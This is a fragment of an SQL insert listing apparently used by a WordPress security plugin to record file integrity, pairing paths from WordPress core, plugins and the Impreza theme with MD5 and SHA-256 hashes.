(0xad295b224ab94894ee7ce76a6b8afb24, 'wp-admin/js/customize-widgets.js', 1, 0x00000000000000000000000000000000, 0x2538bc7069ff25eba18dad8e31909458, 0x52dae965efbbbc6c63855f3ff548af05caf9c86d0d4636b61f735905b434dba7, '', 0, '?'),
(0xad3c1eafb8f610930e8cd2574363036b, 'wp-content/plugins/wp-super-cache/readme.txt', 1, 0x00000000000000000000000000000000, 0xd730fe272d471f8254d7d500a740a9a5, 0xf82a2750780edb7d6f230223f6d6f31acec3110600da489adea4855555d8d417, '', 0, '?'),
(0xad3f46cfb8bdeb1cbca54186805231ca, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php', 1, 0x00000000000000000000000000000000, 0x99708b98d48fa66430c4e06c4e26372b, 0x5e1f730af94002472ca41dda960a3b7c3350096ed4942f0d7a1041dd220a6407, '', 0, '?'),
(0xad469846015051248c187a6e13fc6386, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-ninja-forms.php', 0, 0x6a827f82cf3532cff8e3b57343f08cba, 0x6a827f82cf3532cff8e3b57343f08cba, 0xf7e389e26ee1c8438864920412a77008e4288a908dda6df42c4b58730f4e997f, '', 0, '?'),
(0xad4a54563044b7ee6f5441efbcbb40a1, 'wp-admin/options-discussion.php', 1, 0x00000000000000000000000000000000, 0x1f5abba754573061d922e9eec9b0f94c, 0x7e3782740b32edaae974b935760ef817dc42b16e6cf1b8b75139dc1524d2d0ce, '', 0, '?'),
(0xad4b66870d6bdc1ca906b536d2425f29, 'wp-content/plugins/js_composer/include/params/tab_id/tab_id.php', 0, 0x2e154e1efade4eb26b4de718199f1b64, 0x2e154e1efade4eb26b4de718199f1b64, 0xc14968696a4af01e8715d8c636e0e2b7a666ba928ba545b11ed0c382d2eb984d, '', 0, '?'),
(0xad574fe4dd0bed069cfeeb50183665bc, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-search01.svg', 0, 0xd91b5f850034bd4ffb561d222181feb1, 0xd91b5f850034bd4ffb561d222181feb1, 0x452d7dfd61de2184553edc56837ac81edfb80716747150e831bc5ae922f825d8, '', 0, '?'),
(0xad73a1a5e0025a6946a2cd7cae1a326a, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_weak_24px.svg', 0, 0xc3e5457e7d029421c6f06fb513772a4a, 0xc3e5457e7d029421c6f06fb513772a4a, 0xcad7c45e56ef219ab527ba65dc6d48c170faae3f986504813536f8a7fe1ea39a, '', 0, '?'),
(0xad878b8253e0384d01df4389a43eebc7, 'wp-includes/js/dist/block-serialization-default-parser.min.js', 1, 0x00000000000000000000000000000000, 0x8aec553ccda8f9b035a814de6f28e029, 0x476c45c2b9d4e60c63f5c7a319387105b36274fd7a653c25f9fde35318329a32, '', 0, '?'),
(0xad9985ef8f566314dd7df8a9cf59f56c, 'wp-content/plugins/revslider/admin/assets/imports/creativefreedom/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xad9d9a9553c768deebe153d025547af8, 'wp-includes/js/mediaelement/wp-mediaelement.css', 1, 0x00000000000000000000000000000000, 0xd4252f4e714f52e5670c05fbc02b5ced, 0x467d1a0a0fe5f5ea76866ef2b21c60a5e75a8121b65487ae57198cb099cf7306, '', 0, '?'),
(0xadc556b9c1f476297e0e8e80876bff89, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_edit_location_24px.svg', 0, 0xc0185d2362dacc15fdf2e8d909c32dd8, 0xc0185d2362dacc15fdf2e8d909c32dd8, 0xd0b022b288306ba599768b04111b975bd7af18312e60896669875dbdc6e146fe, '', 0, '?'),
(0xadccdd22dc9211b3f7d3c36e7a1f4411, 'wp-includes/SimplePie/Caption.php', 1, 0x00000000000000000000000000000000, 0xbdbabcdcca426a4dadf6675bc4c4ebe9, 0xd7041d416227a44c100b063f0651b0934c7274d922bdbbb8ed923294ceabfacb, '', 0, '?'),
(0xaddccb8bdd5f6f2127da759ce1f87f72, 'wp-content/plugins/wordfence/views/common/page-tabbar.php', 1, 0x00000000000000000000000000000000, 0xbb83291aafb00cf374553245633027e9, 0xe4c3ba4dd82e2e388690d1b93e4e77fd6aa55aeef3d0f1a9570862fac32a42bc, '', 0, '?'),
(0xade25a0a7504d56f4bb020afb6543b65, 'wp-admin/images/list.png', 1, 0x00000000000000000000000000000000, 0x1e123e96bd2a1ce2c0d3b305d153f1c3, 0x5c1b77abbb545b853db06216ad1b61436ba98f8f138185aa3b6304a306b607c0, '', 0, '?'),
(0xadf588c225148d26d31f71652c7ff775, 'wp-content/themes/Impreza/framework/vendor/usof/js/colpick.js', 0, 0x1a193f382a157332d67d2e235c36c5b5, 0x1a193f382a157332d67d2e235c36c5b5, 0x2c24a59db92f7df65aa991f570412e81a355a8269112483f2cacaf0f4ecf5588, '', 0, '?'),
(0xadf96c6cb8848378e84c2c3757ca4edb, 'wp-content/plugins/wordfence/views/common/modal-prompt.php', 1, 0x00000000000000000000000000000000, 0x1d68e4ffb217f511870d24d6d36fa68a, 0x6ce53fdf39527722488c5ec90dd37393e9bfc5f389cfefd11a441b3aa346e361, '', 0, '?'),
(0xae0bcce45505792fff052a25fee5fd3b, 'wp-admin/includes/update-core.php', 1, 0x00000000000000000000000000000000, 0x8fc6fa9c271b19838be131a7578bd4ab, 0x9aed93af9df3d8af177079b423c938718674c08dcb0942b5ddc2fe1401834c47, '', 0, '?'),
(0xae0d45f61cc855cf0e9cf8cd84ded91c, 'wp-includes/images/wpspin-2x.gif', 1, 0x00000000000000000000000000000000, 0x6d53acfb07ac1bfdd0db79224389c4d2, 0xb0bd36193653af58a8a30fb1b9feb1364f7dc9343e881d70be22c30fa0942731, '', 0, '?'),
(0xae1257ab87b57f50e697835e71f07980, 'wp-content/plugins/wordfence/lib/menu_firewall.php', 1, 0x00000000000000000000000000000000, 0x6de68ceb325f4d0b6afd19c2dd56f503, 0x22211eb5030f62c40f58c8899e7233b8ce4fe31eef0f6584eb7b307fa398b016, '', 0, '?'),
(0xae275bd1c66b16bbb0c81f94434f6363, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_24px.svg', 0, 0xb32b200a1731f59462376309128ad63c, 0xb32b200a1731f59462376309128ad63c, 0x6d733be0eb2dfb6e201f73cd3c693b6223a0b3004473e6694f58c77859dbf083, '', 0, '?'),
(0xae67285d0d5bab99c692752cbceecd3e, 'wp-content/plugins/revslider/admin/assets/imports/web-product-dark-hero/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xae682f07cd94909e6a9743eab600e66e, 'wp-admin/includes/class-plugin-upgrader-skin.php', 1, 0x00000000000000000000000000000000, 0x33660095c1c66106ccb2959d8eb5fbca, 0x47fdd934e4f2c1cbc211f6761510fbb55eee0631506fb4ca5cf57911e8981e2f, '', 0, '?'),
(0xae788857ba89901c321e65f67576d44c, 'wp-includes/customize/class-wp-customize-background-image-control.php', 1, 0x00000000000000000000000000000000, 0xca087b66d2269b9918455c24f27358d4, 0x52da7633fa9fbcbe7e05c4d0d7def0c0dd7c2e4ff44c9f74d04e1260d1ae81c6, '', 0, '?'),
(0xae7f36ab13a09c3fe19b5e6fefbb23fd, 'wp-includes/sodium_compat/namespaced/Core/SipHash.php', 1, 0x00000000000000000000000000000000, 0x72170b2de4650fc5faf6725ea921837e, 0x85ee60948352e96cd4a54c027ae33f69c2c481414348d3f39eaea35079e9066e, '', 0, '?'),
(0xae87ed2a8c1698b6b1f15d1d410702f7, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/assets/js/switch.js', 0, 0xeebda9841462d3affbbc04a5755164f0, 0xeebda9841462d3affbbc04a5755164f0, 0x800bf84c6cb3576c9e25d0bde22c260f5d41c89871923df40e20b222ba145f9a, '', 0, '?'),
(0xae9574f8ac654ba61d53f67f48cd1376, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/recycle.svg', 0, 0xffbdd1315bf456935553d02bd3862d1d, 0xffbdd1315bf456935553d02bd3862d1d, 0x638abb9820f360135858c8473b7be9597dabad83dbc6ab561b620c4a08d87758, '', 0, '?'),
(0xaea89a83c0f4f8f303dd8833b32b500d, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php', 1, 0x00000000000000000000000000000000, 0xfb94b8972c30c1a75a25c911ade6f99a, 0xed675ef4b94db5c916a9393d262a17ad4d7b0bb012d95862bb302ad37593b9d9, '', 0, '?'),
(0xaeadb4f8fd2640017088d31dcec6c997, 'wp-includes/js/dist/wordcount.min.js', 1, 0x00000000000000000000000000000000, 0x1fbda7deaa611689cc829b97827de193, 0xee383cc814e68332418aa3d4ff2d8a3342238adb095c7afa8c4629ffe66831c2, '', 0, '?'),
(0xaebb8fcea64863f15e9ee2fb13b09029, 'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php', 1, 0x00000000000000000000000000000000, 0xcd44e7a76434fa278f085429c3e77fb7, 0xe14b505581d8f11e777864be2115296eea8ac80c3177833c816d9ec32ec7b366, '', 0, '?'),
(0xaec825e2faaf8edaf4b1b974ada48997, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/class-vc-vendor-layerslider.php', 0, 0x64405374f19a9faf376ccefe3d86f338, 0x64405374f19a9faf376ccefe3d86f338, 0x7d8a3889968583b9e1ec8a7ab5d6fa0defcd7cef4ea262009eff45a6d9e2dccd, '', 0, '?'),
(0xaeeb8dfea7aaeae273709bd0e46510fc, 'wp-admin/includes/class-wp-ms-sites-list-table.php', 1, 0x00000000000000000000000000000000, 0xf5ef1981bc8dc22409631100debeae36, 0x969eb53bbdaf0c43b160b8e37dff450cb22583ce7e8cdaddfd934707aa05f483, '', 0, '?'),
(0xaeed1fd2be07a05d67f889bcf8a684d4, 'wp-content/themes/Impreza/framework/functions/menu.php', 0, 0x155f8a3febc56e6fa189b0ea08c23ba5, 0x155f8a3febc56e6fa189b0ea08c23ba5, 0xb52845312dd62fc7df812e549da71f5ff865ece40f5fdbe3f85c2ba3e21b5a44, '', 0, '?'),
(0xaef33c738ef80f0dbbf3cd270297ac05, 'wp-content/plugins/revslider/admin/views/templates/slides.php', 0, 0x50a1d5adb2194a0ca3ccd354884dbd7e, 0x50a1d5adb2194a0ca3ccd354884dbd7e, 0x9e9ba06239a920e4673f3bd8ad827cb761d480cb4a5d22d5c7eeb6a5e7230cf2, '', 0, '?'),
(0xaefb0609fdd3ad67c8b1216e06915087, 'wp-includes/IXR/class-IXR-client.php', 1, 0x00000000000000000000000000000000, 0x51c4a34bce41cfb25dda8e75850e5951, 0xbc90821f5581c64699d32247f24d117c4c26a906384b3a3a1044dfd3dc6fa174, '', 0, '?'),
(0xaf14188e14626aad470e8eb1914cd692, 'wp-content/plugins/js_composer/include/autoload/vendors/qtranslate-x.php', 0, 0x261a467781f416900ce13db8f273ded2, 0x261a467781f416900ce13db8f273ded2, 0x4860eaa8bc18037c9da9e6738511de3bc1f61c1190e61ee88d89c535c6bb93a4, '', 0, '?'),
(0xaf2c3802d17d03681b206a701f80bf35, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/js/slick.js', 0, 0x1b392851a660e72b1da2eb5e71dad6d4, 0x1b392851a660e72b1da2eb5e71dad6d4, 0x0748a4425444857c257c78afd2908da5fc31bd889d71c10373c6ba5c260e0751, '', 0, '?'),
(0xaf2d31f038fc3ba754f6022f58e2a95d, 'wp-admin/ms-sites.php', 1, 0x00000000000000000000000000000000, 0xd542a17566d36135003ef69141370efe, 0x58962208811aeb6fc5057f051222e87caf847653dd0cf81a0e7bc18715e8acda, '', 0, '?'),
(0xaf33dc74d4cbcb4f994210b128735308, 'wp-content/themes/Impreza/framework/templates/search.php', 0, 0x0d15a6dce10ca2c1cce8f4072837479a, 0x0d15a6dce10ca2c1cce8f4072837479a, 0x01e56a4c0637c7b7d569acffb8fdda91cb49d3607d99b80557049346e3684eb6, '', 0, '?'),
(0xaf45a1ef1f0f4d5e88215178c0202c58, 'wp-content/plugins/Ultimate_VC_Addons/vc_templates/single_tab.php', 0, 0xbe3dbf2ba3ca153bf2dc0311bf4fb70a, 0xbe3dbf2ba3ca153bf2dc0311bf4fb70a, 0x7febd1c91be64b40bc977effe9b17b9faf0df53a8573361f4d6a7c6a968b5180, '', 0, '?'),
(0xaf5e33b191bd640cf2b24ec16bcfc5a6, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_laundry_service_24px.svg', 0, 0x3edd796cdeeee03b36deedc1704656c5, 0x3edd796cdeeee03b36deedc1704656c5, 0x9085fc133c2d7039a1df33fde2c536cef3d19b6894833963def42346611f658f, '', 0, '?'),
(0xaf6ad03c4dbd4464b197feee08346db3, 'wp-admin/includes/ms-admin-filters.php', 1, 0x00000000000000000000000000000000, 0xbd4aa87582b61b35f16be99d73c7934c, 0x5a686ed088fa0eda23f4366430e2af10a4c73df3dfe5e06c05286435f0c02829, '', 0, '?'),
(0xaf830c6cb2fdc3922d3b50e8274087e1, 'wp-content/plugins/js_composer/config/content/shortcode-vc-gallery.php', 0, 0x4cc475a44ae9ad2525748ff68f1d7df7, 0x4cc475a44ae9ad2525748ff68f1d7df7, 0x26e3c510e46dd9d098b6ed03943862cd68a9efc53c6c4b9d43e63a88bfaab55e, '', 0, '?'),
(0xafb76eb79820453c526404d2caa983c4, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flip_24px.svg', 0, 0x5fa0f86f52f0390e349408e6b59bee94, 0x5fa0f86f52f0390e349408e6b59bee94, 0x8fbe521f58416ea0123181981779d61ac11fe9e6f3414c57cdbae728890fe059, '', 0, '?'),
(0xafcea17ed7df93fe3afde8e0c2f8656f, 'wp-content/plugins/wordfence/images/icons/tick128.png', 1, 0x00000000000000000000000000000000, 0xe5c49f8bf86319b7680b3422e8dd10ab, 0xd6d2fbb2e70c5693f87d5820657e47145b43a9e5b386b6e335169bb2a58ab1ef, '', 0, '?'),
(0xafd571dae5ecc91c28712c100bec41a3, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lock.svg', 0, 0x9452bf6a98583dd73f46e9bb68a5bcbd, 0x9452bf6a98583dd73f46e9bb68a5bcbd, 0x2cdde44caf09e25969c61f8b317bc90fd61b30a145843ca740d467e14fa864b2, '', 0, '?'),
(0xafdccf0ce6e528e8a7a83a701152df2f, 'wp-includes/class-walker-nav-menu.php', 1, 0x00000000000000000000000000000000, 0xc72c71326f2aa5bd8d74b2aef19a6032, 0x89a829eccace06817c650587e9fb80e5e22b968145e6b00e03a5fb047fa6573f, '', 0, '?'),
(0xafed90db9b733572307eb307976ea129, 'wp-content/plugins/js_composer/config/content/shortcode-vc-images-carousel.php', 0, 0xfdc026956653f57aa0b6bdbada5efff6, 0xfdc026956653f57aa0b6bdbada5efff6, 0x14166a3a4990fb1449acde1ea9bef3ea46c0a5b9cad2927d872a3b41265a4e4a, '', 0, '?'),
(0xaff08b812835ec6148ad791c6f2c58fe, 'wp-includes/js/jquery/ui/tabs.min.js', 1, 0x00000000000000000000000000000000, 0xb7d1b47a2c57059631f53e42392f7955, 0x9792ead08f7ea6eda66329071495affbb73808790135d4f85df8d1f7ce63063f, '', 0, '?'),
(0xb001492d96bc6929f0506e02d2ccddc0, 'wp-content/plugins/js_composer/include/autoload/params/hidden.php', 0, 0xbc9618f5cd512550b36f1a25452a9cf1, 0xbc9618f5cd512550b36f1a25452a9cf1, 0x789541d60b49c3ae59582c8b927ba681a79ade86ca5aefeec6db9b91fe5b0853, '', 0, '?'),
(0xb01447d4bee109abfb4c013a1a617d6c, 'wp-content/themes/Impreza/framework/templates/elements/post_author.php', 0, 0x0792df0582f395899855d701192c9618, 0x0792df0582f395899855d701192c9618, 0x0f0236a13703d2a3962863ae0c1298dfba1f3e061a6f6a90fd314ee75a84388c, '', 0, '?'),
(0xb0182f379bc3b1e36378eed9709f9667, 'wp-content/plugins/wordfence/views/onboarding/fresh-install.php', 1, 0x00000000000000000000000000000000, 0x0cfd9e04de822129284ef52b55e9cad4, 0xfa0723d9ce8c857c7050d2b0b98a2c6dd10bdb6b79d1740dc31be8dc8fab4036, '', 0, '?'),
(0xb01d058db6daa5b15e69e724e2fde526, 'wp-content/plugins/wordfence/lib/wfCredentialsController.php', 1, 0x00000000000000000000000000000000, 0xf15d4202f7ff6adad64c342e3b90f389, 0xb8aea76d148066b725da66494fdd1246ccbd1581062646e946c5b5fccbf41e73, '', 0, '?'),
(0xb024e5cd9399016212486eae802c002d, 'wp-includes/images/smilies/icon_confused.gif', 1, 0x00000000000000000000000000000000, 0x2f2309c617d3a27701772478eabe9359, 0x5530d65c4cf358a8ef665805c6a6ed7f4700c854ba8ff7241061d23555cc42d2, '', 0, '?'),
(0xb02b1a23544bff405f86ebfcb29ac5d2, 'wp-content/plugins/js_composer/include/autoload/hook-vc-message.php', 0, 0x52c497280f8f4dd25fb2fa4fe9cce950, 0x52c497280f8f4dd25fb2fa4fe9cce950, 0xff8dfcd6f5ef3da639270b5ce20e33244b22b7059e9f9511fda1eb3a75ea4950, '', 0, '?'),
(0xb02cdda1d8cace512451efb8bfc03f68, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vert_24px.svg', 0, 0x3dd74acc788af56259eb7803b76dacb5, 0x3dd74acc788af56259eb7803b76dacb5, 0x3470d297f1b312abf0558de91fe992a92e00736efb91c4eb41f1531951e0ae7b, '', 0, '?'),
(0xb02d9d0ca80fecb793f6b739f145785a, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php', 1, 0x00000000000000000000000000000000, 0x2d67f2100e6c7263d20f8d5d89b18700, 0x0e4142011df62dcb71bd8c3dd933a57a66f2529b720f574d34a190ca5629bea7, '', 0, '?'),
(0xb04e1187fd5a4e4494cd4eb43e055909, 'wp-includes/js/dist/components.min.js', 1, 0x00000000000000000000000000000000, 0x663eaffbf181f29735fceeb3c3f97689, 0xd420c17a3dcfe5c3de706da3c0519f405a391c11d9f3b5acac067138beba2944, '', 0, '?'),
(0xb07b34b42e1184b4129294a3b5239823, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php', 1, 0x00000000000000000000000000000000, 0x0abdb5ca86f096fd7771feec46c4fa98, 0x52fc096a5bcff838d8adcdb89a57ffadaa84459c489cd0fecc85f91761a3db49, '', 0, '?'),
(0xb0a25312003bd0536bb3ad67359d5da0, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid-item-shortcodes.php', 0, 0xdd3dd8c027c129b23c76ec50f61c61f7, 0xdd3dd8c027c129b23c76ec50f61c61f7, 0xfd3ffeef4b70009ce3ffe03b3cac46c862912c4a44d9e1a01f84225f4b030e1e, '', 0, '?'),
(0xb0d0ec74112ff530324919fe1027e787, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_fullscreen_36px.svg', 0, 0x275f9f7c3c1c254beaf7ee785d75e0f5, 0x275f9f7c3c1c254beaf7ee785d75e0f5, 0x03ad1dbe4b9b013b6a80c834f86b4eb5fa2236963bee4041f5567c5303f7b053, '', 0, '?'),
(0xb0d97627036a40d42d13ccff11b22a18, 'wp-includes/widgets/class-wp-widget-media-gallery.php', 1, 0x00000000000000000000000000000000, 0x75f22cb82dafacb653b23b6226d39561, 0xa2c2ea6659f9c80862ea5dd696cf25bfe8f221af4c4242d20c9fdd051fabb7c5, '', 0, '?'),
(0xb102c3fa38777c88886190fe85ad9db7, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_remove_24px.svg', 0, 0xa52e2489b3ce977ea1ec5b75974ad524, 0xa52e2489b3ce977ea1ec5b75974ad524, 0x790131621a332ac7573f4443e0a706ddd8c578a490714154c8a132b916449cf7, '', 0, '?'),
(0xb103bffe3ab0c501a8d0efafea095d42, 'wp-content/plugins/js_composer/assets/vc/logo/wpb-logo-white_32.svg', 0, 0x9ca929384b93302ecb1017f7a27ad325, 0x9ca929384b93302ecb1017f7a27ad325, 0x7f91388b451e4a3d2977063c27d5221cb72af96a1c5ae0277405f46cb3569ea8, '', 0, '?'),
(0xb106e19917b3de8fab48344cce99e034, 'wp-content/plugins/js_composer/include/templates/editors/partials/vc_ui-settings-dropdown.tpl.php', 0, 0xa2086f23c7797fd00534f10b69a53ba7, 0xa2086f23c7797fd00534f10b69a53ba7, 0x882f4b4f71e306d338240bdcbf1884bdd3b0c7af11fea6a36bf9d0342651790b, '', 0, '?'),
(0xb10a732eac2e93ad5f500c50972eba4d, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_arrow_down_24px.svg', 0, 0xbff377df4aa97e9ce1da49a073c72725, 0xbff377df4aa97e9ce1da49a073c72725, 0xbe8b345969146f280ddbbb5ae499a4e8022243b780d7e11b657860928430cb73, '', 0, '?'),
(0xb112fdf7aa6eac9b6ae7f850fa2b85a9, 'wp-admin/includes/class-custom-image-header.php', 1, 0x00000000000000000000000000000000, 0xb7cab1f90e8e49428b30b2fcc2e43a95, 0xf28d1838db264a32c66a984f799cbc7a26d8d0fa4a911b6fc60a6c34ef960144, '', 0, '?'),
(0xb11ef8f1f4471a9fdc21b5bee0223e5c, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/BSF_WP_CLI_Command.php', 0, 0x9915ca155a0d5e0cfa55dfce29ed7811, 0x9915ca155a0d5e0cfa55dfce29ed7811, 0xd28e44e4e23ee29337fa8b1496c30d2d7900f86eae69190683dd591d016decf5, '', 0, '?'),
(0xb1380ae50197c9abc56b67a8dd84f71d, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_mall_24px.svg', 0, 0x0fb919cc94b6830a86cd6df93cd166d3, 0x0fb919cc94b6830a86cd6df93cd166d3, 0x33d48efe91078cdd3efdca607d33ce601ded616f1af4667a9c0e44a2e90cb8dc, '', 0, '?'),
(0xb14c8392857945f57b7f06a617f86693, 'wp-includes/css/dashicons.min.css', 1, 0x00000000000000000000000000000000, 0xc8956481e00463f838b45364f45756df, 0x46eb807dec9e2727eff2bdfa05299191ae00b37f54b8fa73ad857f181487f127, '', 0, '?'),
(0xb14e429161171d5729b8d809243ace95, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_not_connected_26x24px.svg', 0, 0x82a0e1b0e0ccc15c751d9c4447371e9a, 0x82a0e1b0e0ccc15c751d9c4447371e9a, 0xb80e8439388b5d79001422773f89a6060410f983a30b758e7dd2be6175833970, '', 0, '?'),
(0xb14fada6d9c53ef7f0863bf24b5ba301, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/flip-box.js', 0, 0x6a753cb406194b303386819206fa03f9, 0x6a753cb406194b303386819206fa03f9, 0x3b9ca13ebce42340b99483109821106aa600ef0b651db00c634411f54a4e15a2, '', 0, '?'),
(0xb16bca06554c9fedc7a1b924c198fa7f, 'wp-admin/ms-users.php', 1, 0x00000000000000000000000000000000, 0x344e17574215967ae0f48bd084ef1639, 0x09845b3d18078e24c4942afd4aa15a0aa6068c9c6397359c0ce9c95bf7eb0553, '', 0, '?'),
(0xb18240c17fe723aacec68170ae5bb529, 'wp-content/plugins/wordfence/js/jquery.colorbox.1579191227.js', 1, 0x00000000000000000000000000000000, 0x284f88302505368c1039f365a733e56a, 0x7b1be24cfd23ed0d989d075de0fd0a674c38502cb5fca24097ea49722c7b20c4, '', 0, '?'),
(0xb18b3db79d2d58d48d6e7b5db71b7066, 'wp-includes/js/wp-embed-template.js', 1, 0x00000000000000000000000000000000, 0xdbd0d1fb592c2e6eb891e7321206518b, 0x537c6c3e7fa1e40a77c6d977e25af868b547d594c3651ee63f6fea3c9b40db3f, '', 0, '?'),
(0xb18b776518d6f669213cbaa173fa790a, 'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php', 1, 0x00000000000000000000000000000000, 0xfa9874c0a3224ea69f2beef5d59b4ce1, 0xa40f363781453084dc838dd59043af7b5c61fe645062b232e62bfd70573b50de, '', 0, '?'),
(0xb192bc1e8edd7f1347b6bdfc28592925, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/collapse.min.js', 0, 0xe74230a72f4ab868df16d92fe65036d4, 0xe74230a72f4ab868df16d92fe65036d4, 0x462aa38bcf4d4ea699138a383477c13f1ff334129d9198623129051a09e19adb, '', 0, '?'),
(0xb197abc2fb82db9d771736557525a6c0, 'wp-includes/js/dist/vendor/wp-polyfill-element-closest.js', 1, 0x00000000000000000000000000000000, 0x3c6accf0039920bf3c59748c23f4261d, 0x794e4f42d3bbd75d2636824ddc2dbd844a92e4172e8a018eb7f318b93a2eb57b, '', 0, '?'),
(0xb19ac4665375b942eccda53f075e794f, 'wp-admin/css/themes.min.css', 1, 0x00000000000000000000000000000000, 0xa5292a41fb788a8a72e883c4c062beaa, 0x61e9b3e6de4bf270de0f241ab50579cf8bc075e197e9ab6232b691e6e74e5c58, '', 0, '?'),
(0xb1a46c7073cd4f1671eb58396e79ce53, 'wp-content/themes/Impreza/framework/templates/forum.php', 0, 0x5b0c53342d97f86699937ba2695f970c, 0x5b0c53342d97f86699937ba2695f970c, 0x8d895db1b36be65a108b34677ee8d67db7ba9056ab8d9f7171b019c1619f4603, '', 0, '?'),
(0xb1a7a9d97b5e8e8657c8ede8f343b118, 'wp-admin/css/colors/ocean/colors-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x3a9c2e1817bfe75b9f3ca3dc73727ec2, 0x17220d043a494ce009fda227aaafad5a3b3ca8af31145585da213bc107f1e01d, '', 0, '?'),
(0xb1a8a7e9c5736818435df236cc945ff4, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_drink_24px.svg', 0, 0xe9b9144656faefe1e7c44c12b468c5dd, 0xe9b9144656faefe1e7c44c12b468c5dd, 0xadc81bf499191ccfc08fc68efd743c0bdf8d915a0e75970c67f746b572318f80, '', 0, '?'),
(0xb1ab51756fc5eb54ecdae4a1d05accdb, 'wp-content/themes/Impreza/framework/shortcodes/us_sharing.php', 0, 0xd95b10aafdfaa9c350341ff99a4cea82, 0xd95b10aafdfaa9c350341ff99a4cea82, 0x4a94abda7bb0cd8b85e9e45c0d4cd2c15059b2dbec98fb586fd0c32873ac66ce, '', 0, '?'),
(0xb1b679c230bc0f4d9ff48eec158360d3, 'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1579191227.css', 1, 0x00000000000000000000000000000000, 0x902ae1c6a3d9bf633baedbe27abe8bbb, 0xace84ef44abe737fb440d133099a3a6829950f3704194b0ef29b3c945c4efc2b, '', 0, '?'),
(0xb1b82fc97b5402b8cabdd2db8fcae96a, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-single-image.php', 0, 0xd558bf1b59c288a38aa5960179d64668, 0xd558bf1b59c288a38aa5960179d64668, 0xbb6434e493d5d826b0213d1121de0994d4e434349a93c937a4c93a0a9446abd1, '', 0, '?'),
(0xb1bf7d91b1e50e15972ae2cf7116379e, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_store_24px.svg', 0, 0x4316d897351e16448ca03defa85f459d, 0x4316d897351e16448ca03defa85f459d, 0xf154e9572b1cddb334eb0d24f4f21759b92ed80f26c6d4dae37d0099c97681e7, '', 0, '?'),
(0xb1d381d9052a070a676cd8dc05f359c9, 'wp-content/plugins/js_composer/assets/lib/bower/imagesloaded/imagesloaded.pkgd.min.js', 0, 0xb02ee4e77e337c03574c2a9b2d603b58, 0xb02ee4e77e337c03574c2a9b2d603b58, 0xf4c6f7b82867fcef01f3c1eed2fcad5bbb9af40a6e7545bc4e07a3ceb76b1f10, '', 0, '?'),
(0xb1da07a18d8ec09c3ca8482dab41ba0a, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/shortcode.php', 0, 0x0c830070f8bfbf236ce341c118627cdb, 0x0c830070f8bfbf236ce341c118627cdb, 0xc07b60f4e3886ca6d8491c69edb7fcb06c24aac5fbab7a41cc025c9d6ace4598, '', 0, '?'),
(0xb1f0245bdffbdc741c43c5a415497716, 'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php', 1, 0x00000000000000000000000000000000, 0xb5571ef80998e52ca40fe2f77e8d72a0, 0x4c3ef8a119a365a180a180ba8968fd0d4624fb43bf56a1b70eb0a893b7371384, '', 0, '?'),
(0xb2066d3507bce20b758d81cecd317dd8, 'wp-includes/css/dist/block-library/theme.min.css', 1, 0x00000000000000000000000000000000, 0x80145dc9e4908a34d14ca5a87d33c6d7, 0xc9f212fabc33db7b24500dfad28b919e45e955a057df4f9c8bcc24f639291e6b, '', 0, '?'),
(0xb21efc2642b03556eb4155551d2c93ec, 'wp-includes/class-wp-http-cookie.php', 1, 0x00000000000000000000000000000000, 0x31c29fafebcfb4d5428a1e809203c5c6, 0x2364991567745d284b681c1aaf896091fd7b25b7bd3ae1a61572ab5d790ffdbe, '', 0, '?'),
(0xb229fc143a1180272835d622e062460e, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_row.js', 0, 0xf95a2c5db7aa0db13ea394126eac26ec, 0xf95a2c5db7aa0db13ea394126eac26ec, 0x788e018e6c19cad0527554c17da924d4f2f823086724709a22fea8df6d4a53e0, '', 0, '?'),
(0xb24b681b1827a23fcc69d9efbdfd5932, 'wp-content/plugins/js_composer/include/classes/editors/class-vc-edit-form-fields.php', 0, 0x255e3879552dd07385eeea98932db311, 0x255e3879552dd07385eeea98932db311, 0xebe002d9ae6a03c692e2e792ad8a494d3a9969dcbe3ee88949637fa27fa22d61, '', 0, '?'),
